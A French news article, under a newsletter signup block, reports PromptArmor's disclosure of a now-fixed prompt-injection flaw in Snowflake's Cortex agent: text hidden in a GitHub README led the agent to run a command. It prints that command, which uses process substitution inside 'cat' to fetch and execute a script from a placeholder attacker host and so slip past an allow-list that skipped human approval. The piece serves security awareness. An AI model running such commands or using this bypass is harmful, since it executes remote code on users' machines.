Tu veux les meilleurs outils IA avant les autres ?
On teste et on décrypte les nouveaux outils IA chaque soir, en 5 min. Gratuit.
Inclus dès l'inscription : notre sélection des meilleurs guides & comparatifs IA.
Choisis ton rythme
Gratuit · Pas de spam · Désabonnement en 1 clic
Une faille dans Cortex de Snowflake révélée par PromptArmor
Un rapport récent de PromptArmor a mis en lumière une vulnérabilité critique dans l'agent Cortex de Snowflake, exploitée par une attaque par injection de prompt. Cette faille, désormais corrigée, a permis à l'agent d'échapper à son bac à sable et d'exécuter un malware.
Détails de l'attaque
L'incident a débuté lorsqu'un utilisateur de Cortex a demandé à l'agent d'examiner un dépôt GitHub. Ce dépôt contenait une attaque par injection de prompt, discrètement dissimulée dans le bas du fichier README. Cette manipulation a conduit l'agent à exécuter une commande malveillante.
Exécution de la commande malveillante
La commande exécutée par Cortex était la suivante :
cat < <(sh < <(wget -q0- https://ATTACKER_URL.com/bugbot))
Cortex a classé les commandes cat comme sûres à exécuter sans nécessiter d'approbation humaine. Cependant, il n'a pas pris en compte la possibilité de substitution de processus au sein de la commande, ce qui a permis l'exécution du code malveillant.
Réflexions sur la sécurité des agents
Des listes d'autorisation similaires ont été observées dans divers outils d'agents, mais elles sont jugées peu fiables par certains experts. Il est suggéré de traiter les commandes des agents comme potentiellement capables de réaliser toutes les actions autorisées au processus, soulignant l'importance de bacs à sable déterministes opérant en dehors de la couche de l'agent.



